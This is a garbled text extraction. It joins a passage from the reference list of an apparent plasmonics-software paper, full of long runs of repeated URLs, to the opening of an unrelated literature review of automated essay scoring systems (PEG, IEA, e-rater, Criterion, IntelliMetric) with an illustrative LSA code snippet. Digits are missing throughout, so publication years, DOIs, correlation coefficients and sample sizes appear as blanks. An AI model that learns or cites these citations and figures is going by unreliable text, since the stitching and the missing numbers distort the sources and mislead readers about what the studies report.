international journal of nanomedicine ( ): – doi . /ijn.s . kessentini s, barchiesi d. . quantitative comparison of optimized nanorods, nanoshells and hollow nanospheres for photothermal therapy. biomedical optics express ( ): – doi . /boe. . . klebstov ng. . optical models for conjugates of gold and silver nanoparticles with biomacromolecules. journal of quantitative spectroscopy & radiative transfer : – doi . /j.jqsrt. . . . kraziński be, radecki j, radecka h. . surface plasmon resonance based biosensors for exploring the influence of alkaloids on aggregation of amyloid-β peptide. sensors ( ): – doi . /s . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ja q http://dx.doi.org/ . /josa. . http://dx.doi.org/ . /j.cpc. . . http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://dx.doi.org/ . /peerj.preprints. v http://dx.doi.org/ . /b b http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jp o http://dx.doi.org/ . /ac w http://dx.doi.org/ . /jnn. . http://dx.doi.org/ . /jsst. . . . http://dx.doi.org/ . /physrevb. . http://dx.doi.org/ . /ijn.s http://dx.doi.org/ . /boe. . http://dx.doi.org/ . /j.jqsrt. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. lans pc. . spectral density analysis of thin gold films: thickness and structure dependence of the optical properties. in: progress in electromagnetics research symposium proceedings, vol. , stockholm, – . lecaruyer p, maillart e, canva m, rolland j. . generalization of the rouard method to an absorbing thin-film stack and application to surface plasmon resonance. applied optics ( ): – doi . /ao. . . lee k-s, el-sayed ma. . gold and silver nanoparticles in sensing and imaging: sensitivity of plasmon response to size, shape, and metal composition. the journal of physical chemistry b ( ): – doi . /jp y. 
lee j-y, lee c-w, lin e-h, wei p-k. . single live cell refractometer using nanoparticle coated fiber tip. applied physics letters ( ): doi . / . . li x, tamada k, baba a, knoll w, hara m. . estimation of dielectric function of biotin-capped gold nanoparticles via signal enhancement on surface plasmon resonance. the journal of physical chemistry. b ( ): – doi . /jp h. library g, office il, states u, code us. . theoretical investigations for surface plasmon resonance based optical fiber tip sensor. sensors and actuators b: chemical ( ): – . lin h-y, huang c-h, liu y-c, huang k-w, chau l-k. . multiplex fiber-optic biosensor using multiple particle plasmon resonances. in: canning j, peng g, eds. third asia pacific optical sensors conference. s– s– . lin h, liu cp, wang c. . a simple and universal setup of quasi-monocolor gamma-ray source. – arxiv preprint. arxiv: . . lipoprotein l-d, verma r, srivastava sk, gupta bd. . surface-plasmon-resonance-based fiber-optic sensor for the detection. ieee sensors journal ( ): – doi . /jsen. . . litos ik, ioannou pc, christopoulos tk, traeger-synodinos j, kanavakis e. . multianalyte, dipstick-type, nanoparticle-based dna biosensor for visual genotyping of single-nucleotide polymorphisms. biosensors & bioelectronics ( ): – doi . /j.bios. . . . liu x, wu y, wang x, li r, zhang z. . effect of interphase on effective permittivity of composites. journal of physics d: applied physics ( ): doi . / - / / / . lopatynskyi am, lopatynska og, guo lj, chegel vi. . localized surface plasmon resonance biosensor—part i: theoretical study of sensitivity—extended mie approach. ieee sensors journal ( ): – doi . /jsen. . . luo r. . effective medium theories for the optical properties of three-component composite materials. applied optics ( ): – doi . /ao. . . malasi a, kalyanaraman r, garcia h. . from mie to fresnel through effective medium approximation with multipole contributions. journal of optics ( ): doi . / - / / / . malinsky md, kelly kl, schatz gc, duyne rpv. . chain length dependence and sensing capabilities of the localized surface plasmon resonance of silver nanoparticles chemically modified with alkanethiol self-assembled monolayers. journal of the american chemical society ( ): – doi . /ja a. mayer km, hafner jh, antigen aa. . localized surface plasmon resonance sensors. chemical reviews ( ): – doi . /cr v. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ao. . http://dx.doi.org/ . /jp y http://dx.doi.org/ . / . http://dx.doi.org/ . /jp h http://arxiv.org/abs/ . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /j.bios. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /ao. . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /ja a http://dx.doi.org/ . /cr v http://dx.doi.org/ . /peerj-cs. mayer km, lee s, liao h, rostro bc, fuentes a, scully pt, nehl cl, hafner jh. . a label-free immunoassay based upon localized surface plasmon resonance of gold nanorods. acs nano ( ): – doi . /nn . mckinney w. . data structures for statistical computing in python. in: van der walt s, millman j, eds. proceedings of the th python in science conference. – . mishra ak, mishra sk, gupta bd. . spr based fiber optic sensor for refractive index sensing with enhanced detection accuracy and figure of merit in visible region. optics communications : – doi . /j.optcom. . . . mitsui k, handa y, kajikawa k. . optical fiber affinity biosensor based on localized surface plasmon resonance. 
applied physics letters ( ): – doi . / . . moharam mg, pommet da, grann eb, gaylord tk. . stable implementation of the rigorous coupled-wave analysis for surface-relief gratings: enhanced transmittance matrix approach. journal of the optical society of america a ( ): – doi . /josaa. . . moirangthem rs, chang y-c, wei p-k. . ellipsometry study on gold-nanoparticle-coated gold thin film for biosensing application. biomedical optics express ( ): – doi . /boe. . . myroshnychenko v, rodrı́guez-fernández j, pastoriza-santos i, funston am, novo c, mulvaney p, liz-marzán lm, garcı́a de abajo fj. . modelling the optical response of gold nanoparticles. chemical society reviews ( ): – doi . /b a. nath n, chilkoti a. . a colorimetric gold nanoparticle sensor to interrogate biomolecular interactions in real time on a surface. analytical chemistry ( ): – doi . /ac x. nikoobakht b, el-sayed ma. . preparation and growth mechanism of gold nanorods (nrs) using seed-mediated growth method. chemistry of materials ( ): – doi . /cm l. nucleicdevelopmentteam. . welcome to enaml. available at http://nucleic.github.io/enaml/ docs/. nusz gj, curry ac, marinakos sm, wax a, chilkoti a. . rational selection of gold nanorod geometry for label-free plasmonic biosensors. acs nano ( ): – doi . /nn . oliphant te. . python for scientific computing. computing in science & engineering ( ): – doi . /mcse. . . optenso. . optenso: optical engineering software. available at http://www.optenso.com/ contact/cprofile.html. orfanidis s. . electromagnetic waves and antennas. new jersey: ece rutgers. pease lf, tsai d-h, hertz jl, zangmeister ra, zachariah mr, tarlov mj. . packing and size determination of colloidal nanoclusters. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la t. pei z, anderson h, myrskog a, dunér g, ingemarsson b, aastrup t. . optimizing immobilization on two-dimensional carboxyl surface: ph dependence of antibody orientation and antigen binding capacity. analytical biochemistry ( ): – doi . /j.ab. . . . pellegrini g, mattei g. . high-performance magneto-optic surface plasmon resonance sensor design: an optimization approach. plasmonics ( ): – doi . /s - - - . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nn http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /boe. . http://dx.doi.org/ . /b a http://dx.doi.org/ . /ac x http://dx.doi.org/ . 
/cm l http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://dx.doi.org/ . /nn http://dx.doi.org/ . /mcse. . http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://dx.doi.org/ . /la t http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. perez f, granger b. . 
ipython: a stystem for interactive scientific computing. computing in science and engineering ( ): – doi . /mcse. . . pollard t d. . a guide to simple and informative binding assays. molecular biology of the cell ( ): – doi . /mbc.e - - . polyanskiy mn. . refractive index database. available at http://refractiveindex.info. punjabi ns, mukherji s. . fabrication of out-of-plane multi-bend fiber-optic sensor for enhanced refractive index sensing. in: th international conference on fiber optics and photonics. :t a. . quinten m. . optical properties of nanoparticle systems. first edition. weinheim: kgaa, wiley-vch verlag & co. rathgen h. . mrcwa—multilayer rigorous coupled wave analysis. available at http://mrcwa. sourceforge.net/. richard bm, anna jt. . handbook of surface plasmon resonance. london: royal society of chemistry. rouard mp. . etudes des propriétés optiques des lames métalliques très minces. annales de physique (paris) series ii : – . sancho-parramon j. . tuning the effective dielectric function of thin film metal–dielectric composites by controlling the deposition temperature. journal of nanophotonics ( ): doi . / . . sarid d, challener w. . modern introduction to surface plasmons: theory, mathematica modeling and applications. first edition. cambridge: cambridge university press. sau tk, rogach a l, jäckel f, klar ta, feldmann j. . properties and applications of colloidal nonspherical noble metal nanoparticles. advanced materials ( ): – doi . /adma. . scarpettini af, bragas av. . coverage and aggregation of gold nanoparticles on silanized glasses. langmuir ( ): – doi . /la b. schasfoort rbm, lau wd, kooi avd, clevers h, engbers ghm. . method for estimating the single molecular affinity. analytical biochemistry ( ): – doi . /j.ab. . . . sciacca b, monro tm. . dip biosensor based on localized surface plasmon resonance at the tip of an optical fiber. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la q. sharma a, gupta bd. . fibre-optic sensor based on surface plasmon resonance with ag–au alloy nanoparticle films. nanotechnology ( ): – doi . / - / / / . sharma ak, gupta bd. . on the performance of different bimetallic combinations in surface plasmon resonance based fiber optic sensors. journal of applied physics ( ): doi . / . . shrivastav am, mishra sk, gupta bd. . fiber optic spr sensor for the detection of melamine using molecular imprinting. sensors and actuators b: chemical : – doi . /j.snb. . . . singh s, verma rk, gupta bd. . led based fiber optic surface plasmon resonance sensor. optical and quantum electronics ( ): – doi . /s - - - . singh j, whitten je. . adsorption of -mercaptopropyltrimethoxysilane on silicon oxide surfaces and adsorbate interaction with thermally deposited gold. journal of physical chemistry c ( ): – doi . /jp z. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . 
/mbc.e - - http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://dx.doi.org/ . / . http://dx.doi.org/ . /adma. http://dx.doi.org/ . /la b http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /la q http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.snb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jp z http://dx.doi.org/ . /peerj-cs. sopra sc. . optical data from sopra sa. available at http://www.sspectra.com/sopra.html. steed rj. . transfer matrix theory for a type of uniaxial layers: from basic electromagnetism to quantum well intersubband transitions. available at http://www.researchgate.net/publication/ . sun y, xia y. . increased sensitivity of surface plasmon resonance of gold nanoshells compared to that of gold solid colloids in response to environmental changes. analytical chemistry ( ): – doi . /ac . tang l, dong c, ren j. . highly sensitive homogenous immunoassay of cancer biomarker using silver nanoparticles enhanced fluorescence correlation spectroscopy. talanta ( - ): – doi . /j.talanta. . . . trügler a. . optical properties of metallic nanoparticles. phd thesis, institut für physik, fachbereich theoretische physik karl–franzens–universität graz. tsai d-h, davila-morris m, delrio fw, guha s, zachariah mr, hackley va. . quantitative determination of competitive molecular adsorption on gold nanoparticles using attenuated total reflectance-fourier transform infrared spectroscopy. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la . tsang l, kong ja, shin rt. . theory of microwave remote sensing. new york: wiley. tsortos a, papadakis g, mitsakakis k, melzak ka, gizeli e. . quantitative determination of size and shape of surface-bound dna using an acoustic wave sensor. biophysical journal ( ): – doi . /biophysj. . . van de hulst hc. . light scattering by small particles. dover books. varoquaux g. . 
writing a graphical application for scientific programming using traitsui: a step-by-step guide for a non-programmer. available at http://code.enthought.com/projects/traits/ docs/html/tutorials/traits ui scientific app.html. wan m, luo p, jin j, xing j, wang z, wong stc. . fabrication of localized surface plasmon resonance fiber probes using ionic self-assembled gold nanoparticles. sensors ( ): – doi . /s . wilczewska az, niemirowicz k, markiewicz kh, car h. . nanoparticles as drug delivery systems. pharmacological reports ( ): – doi . /s - ( ) - . willets ka, van duyne rp. . localized surface plasmon resonance spectroscopy and sensing. annual review of physical chemistry (october): – doi . /annurev.physchem. . . . wu b, wang q-k. . investigation of highly sensitive surface plasmon resonance biosensors with au nanoparticles embedded dielectric film using rigorous coupled wave analysis. optica applicata ( ): – . yin g, wang s-y, xu m, chen l-y. . theoretical calculation of the optical properties of gold nanoparticles. ( ): – . zakaria h, shah a, konieczny m, hoffman j, nijdam j, reeves m. . small molecule and amino acid induced aggregation of gold nanoparticles. langmuir ( ): – doi . /la v. zhdanov m. . generalized effective-medium theory of induced polarization. geophysics ( ):f –f doi . / . . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ 
submitted may accepted june published august corresponding author mohamed abdellatif hussein, teeefa@nceee.edu.eg, teeefa@gmail.com academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright hussein et al. distributed under creative commons cc-by .
open access

automated language essay scoring systems: a literature review

mohamed abdellatif hussein, hesham hassan and mohammad nassef

information and operations, national center for examination and educational evaluation, cairo, egypt
faculty of computers and information, computer science department, cairo university, cairo, egypt

abstract

background. writing composition is a significant factor for measuring test-takers' ability in any language exam. however, the assessment (scoring) of these writing compositions or essays is a very challenging process in terms of reliability and time. the demand for objective and quick scores has raised the need for a computer system that can automatically grade essay questions targeting specific prompts. automated essay scoring (aes) systems are used to overcome the challenges of scoring writing tasks by using natural language processing (nlp) and machine learning techniques. the purpose of this paper is to review the literature on the aes systems used for grading essay questions.

methodology. we reviewed the existing literature using google scholar, ebsco and eric, searching for the terms "aes", "automated essay scoring", "automated essay grading", or "automatic essay" for essays written in the english language. two categories have been identified: handcrafted-features and automatic-featuring aes systems. the systems of the former category are closely bound to the quality of the designed features. on the other hand, the systems of the latter category are based on the automatic learning of the features and relations between an essay and its score without any handcrafted features. we reviewed the systems of the two categories in terms of system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores. the paper includes three main sections. first, we present a structured literature review of the available handcrafted-features aes systems. second, we present a structured literature review of the available automatic-featuring aes systems. finally, we draw a set of discussions and conclusions.

results. aes models have been found to utilize a broad range of manually-tuned shallow and deep linguistic features. aes systems have many strengths: reducing labor-intensive marking activities, ensuring a consistent application of scoring criteria, and ensuring the objectivity of scoring. although many techniques have been implemented to improve aes systems, three primary challenges have been identified. the challenges are the lack of the human rater's sense of judgment, the potential that the systems can be deceived into giving an essay a lower or higher score than it deserves, and the limited ability to assess the creativity and practicality of the ideas and propositions. existing techniques have addressed only the first two challenges.

subjects artificial intelligence, computer education
keywords aes, automated essay scoring, essay grading, handcrafted features, automatic features extraction

how to cite this article hussein ma, hassan h, nassef m. . automated language essay scoring systems: a literature review. peerj comput. sci. :e http://doi.org/ . /peerj-cs.
introduction

test items (questions) are usually classified into two types: selected-response (sr) and constructed-response (cr). the sr items, such as true/false, matching or multiple-choice, are much easier than the cr items in terms of objective scoring (isaacs et al., ). sr questions are commonly used for gathering information about knowledge, facts, higher-order thinking, and problem-solving skills. however, considerable skill is required to develop test items that measure analysis, evaluation, and other higher cognitive skills (stecher et al., ). cr items, sometimes called open-ended, include two sub-types: restricted-response and extended-response items (nitko & brookhart, ). extended-response items, such as essays, problem-based examinations, and scenarios, are like restricted-response items, except that they extend the demands made on test-takers to include more complex situations, more difficult reasoning, and higher levels of understanding based on real-life situations that require test-takers to apply their knowledge and skills to new settings or situations (isaacs et al., ).

in language tests, test-takers are usually required to write an essay about a given topic. human-raters score these essays based on specific scoring rubrics or schemes. it often occurs that the scores assigned to an essay by different human-raters vary substantially because human scoring is subjective (peng, ke & xu, ). as the process of human scoring takes much time and effort, and is not always as objective as required, there is a need for an automated essay scoring system that reduces cost and time and determines an accurate and reliable score.

automated essay scoring (aes) systems usually utilize natural language processing and machine learning techniques to automatically rate essays written for a target prompt (dikli, ). many aes systems have been developed over the past decades. they focus on automatically analyzing the quality of the composition and assigning a score to the text. typically, aes models exploit a wide range of manually-tuned shallow and deep linguistic features (farag, yannakoudakis & briscoe, ). recent advances in deep learning have shown that applying neural network approaches to aes systems can accomplish state-of-the-art results (page, ; valenti, neri & cucchiarelli, ), with the additional benefit of using features that are automatically learnt from the data.

survey methodology

the purpose of this paper is to review the aes systems literature pertaining to scoring extended-response items in language writing exams. using google scholar, ebsco and eric, we searched the terms "aes", "automated essay scoring", "automated essay grading", or "automatic essay" for essays written in the english language. aes systems which score objective or restricted-response items are excluded from the current research. the most common models found for aes systems are based on natural language processing (nlp), bayesian text classification, latent semantic analysis (lsa), or neural networks. we have categorized the reviewed aes systems into two main categories. the former is based on handcrafted discrete features bound to specific domains. the latter is based on automatic feature extraction.
for instance, artificial neural network (ann)-based approaches are capable of automatically inducing dense syntactic and semantic features from a text. the literature of the two categories has been structurally reviewed and evaluated based on certain factors including: system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores.

handcrafted features aes systems

project essay grader™ (peg)

ellis page developed the peg in . peg is considered the earliest aes system built in this field. it utilizes correlation coefficients to predict the intrinsic quality of the text. it uses the terms "trins" and "proxes" to assign a score: whereas "trins" refers to intrinsic variables like diction, fluency, punctuation, and grammar, "proxes" refers to correlations between intrinsic variables such as average word length in a text and/or text length (dikli, ; valenti, neri & cucchiarelli, ). the peg uses a simple scoring methodology that consists of two stages: the former is the training stage and the latter is the scoring stage. peg should be trained on a sample of essays (from to essays); the output of the training stage is a set of coefficients (β weights) for the proxy variables from the regression equation. in the scoring stage, proxes are identified for each essay and inserted into the prediction equation. in the end, a score is determined by applying the coefficients (β weights) estimated in the training stage (dikli, ). some issues have been raised as criticisms of the peg, such as disregarding the semantic side of essays, focusing on surface structures, and not working effectively when receiving student responses directly (which might ignore writing errors). peg has a modified version released in , which focuses on grammar checking, with a correlation between human assessors and the system (r = . ) (dikli, ; page, ; refaat, ewees & eisa, ). measurement inc. acquired the rights to peg in and continued to develop it. the modified peg analyzes the training essays and calculates more than features that reflect intrinsic characteristics of writing, such as fluency, diction, grammar, and construction. once the features have been calculated, the peg uses them to build statistical and linguistic models for the accurate prediction of essay scores (home—measurement incorporated, ).

intelligent essay assessor™ (iea)

iea was developed by landauer ( ). iea uses a statistical combination of several measures to produce an overall score. it relies on latent semantic analysis (lsa), a machine-learning model of human understanding of text that depends on the training and calibration methods of the model and the ways it is used tutorially (dikli, ; foltz, gilliam & kendall, ; refaat, ewees & eisa, ). iea can handle students' innovative answers by using a mix of scored essays and the domain content text in the training stage. it also spots plagiarism and provides feedback (dikli, ; landauer, ).

figure: the iea architecture.

it uses a procedure for assigning scores in a process that begins with comparing essays to each other in a set. lsa examines the extremely similar essays: irrespective of paraphrasing, synonym replacement, or reorganization of sentences, the two essays will appear similar to lsa.
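the lsa machinery behind this comparison is proprietary to iea, but the general idea can be sketched with off-the-shelf tools. the snippet below is a minimal, illustrative example (assuming scikit-learn; the tiny pre-scored essay set, the two latent components, and the similarity-weighted scoring rule are hypothetical choices, not iea's method): essays are projected into a low-dimensional latent semantic space, so paraphrased or reordered essays end up with similar vectors, and a new essay can be scored from its similarity to pre-scored ones.

```python
# Illustrative LSA-style comparison of essays (not IEA's implementation).
# Assumes scikit-learn; the essays, scores, and scoring rule are hypothetical.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity

scored_essays = [
    ("the water cycle moves water between oceans, air, and land through evaporation", 5),
    ("evaporation and condensation of water drive clouds and precipitation patterns", 4),
    ("my summer holiday was fun because i played football with my friends", 1),
]
new_essay = "rain forms when evaporated moisture condenses into clouds and falls back to land"

texts = [essay for essay, _ in scored_essays] + [new_essay]
tfidf = TfidfVectorizer(stop_words="english").fit_transform(texts)

# Project into a low-dimensional latent semantic space; a real system would
# train on many essays and keep far more components (e.g., 100-300).
vectors = TruncatedSVD(n_components=2, random_state=0).fit_transform(tfidf)

# Score the new essay as a similarity-weighted average of the pre-scored essays.
sims = cosine_similarity(vectors[-1:], vectors[:-1])[0].clip(min=0)
scores = [score for _, score in scored_essays]
predicted = float((sims * scores).sum() / (sims.sum() or 1.0))
print(f"predicted score ~ {predicted:.1f}")
```

in practice, far more pre-scored essays and latent dimensions would be used, and the scoring rule would be calibrated against human scores.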
plagiarism detection is an essential feature for overcoming academic dishonesty, which is difficult for human-raters to detect, especially when grading a large number of essays (dikli, ; landauer, ). (fig. ) represents the iea architecture (landauer, ). iea requires smaller numbers of pre-scored essays for training. in contrast to other aes systems, iea requires only pre-scored training essays per prompt vs. – on other systems (dikli, ). landauer ( ) used iea to score more than students' answers in middle school. the results showed a . correlation value between iea and the human-raters. he attributed the high correlation value to several reasons, including that human-raters could not compare each essay to every other essay for the students while iea can do so (dikli, ; landauer, ).

e-rater

educational testing services (ets) developed e-rater in to estimate the quality of essays in various assessments. it relies on a combination of statistical and nlp techniques to extract linguistic features (such as grammar, usage, mechanics, development) from text, then compares scores with human-graded essays (attali & burstein, ; dikli, ; ramineni & williamson, ). the e-rater system is upgraded annually. the current version uses features divided into two areas: writing quality (grammar, usage, mechanics, style, organization, development, word choice, average word length, proper prepositions, and collocation usage), and content or use of prompt-specific vocabulary (ramineni & williamson, ). the e-rater scoring model consists of two stages: a training stage and an evaluation stage. human scores are used for training and evaluating the e-rater scoring models. the quality of the e-rater models and their effective functioning in an operational environment depend on the nature and quality of the training and evaluation data (williamson, xi & breyer, ). the correlation between human assessors and the system ranged from . to . (refaat, ewees & eisa, ).

criterion

criterion is a web-based scoring and feedback system based on ets text analysis tools: e-rater and critique. as a text analysis tool, critique integrates a collection of modules that detect faults in usage, grammar, and mechanics, and recognizes discourse and undesirable style elements in writing. it provides immediate holistic scores as well (crozier & kennedy, ; dikli, ). criterion similarly gives personalized diagnostic feedback reports based on the types of assessment instructors give when they comment on students' writings. this component of criterion is called the advisory component. it is added to the score, but it does not control it. the types of feedback the advisory component may provide include the following:
• the text is too brief (a student may write more).
• the essay text does not look like other essays on the topic (the essay is off-topic).
• the essay text is overly repetitive (the student may use more synonyms) (crozier & kennedy, ).

intellimetric tm

vantage learning developed the intellimetric system in . it is considered the first aes system which relies on artificial intelligence (ai) to simulate the manual scoring process carried out by human-raters under the traditions of cognitive processing, computational linguistics, and classification (dikli, ; refaat, ewees & eisa, ).
